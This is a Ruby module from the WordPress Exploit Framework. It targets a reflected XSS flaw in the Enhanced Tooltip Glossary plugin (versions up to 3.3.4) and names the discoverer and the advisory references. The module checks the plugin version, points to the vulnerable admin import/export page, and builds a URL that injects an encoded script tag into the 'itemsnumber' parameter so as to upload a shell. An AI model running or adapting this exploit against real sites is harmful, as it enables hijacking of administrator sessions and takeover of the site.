# frozen_string_literal: true

class Wpxf::Exploit::EnhancedTooltipGlossaryReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'Enhanced Tootip Glossary <= 3.3.4 Reflected XSS Shell Upload',
      author: [
        'Larry W. Cashdollar', # Discovery
        'rastating'            # WPXF module
      ],
      references: [
        ['WPVDB', '8494'],
        ['URL', 'http://www.vapidlabs.com/wp/wp_advisory.php?v=37']
      ],
      date: 'Feb 09 2016'
    )
  end

  def check
    check_plugin_version_from_readme('enhanced-tooltipglossary', '3.3.5')
  end

  def vulnerable_url
    normalize_uri(wordpress_url_plugins, 'enhanced-tooltipglossary', 'backend', 'views', 'admin_importexport.php')
  end

  def url_with_xss
    "#{vulnerable_url}?itemsnumber=%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E&msg=imported"
  end
end
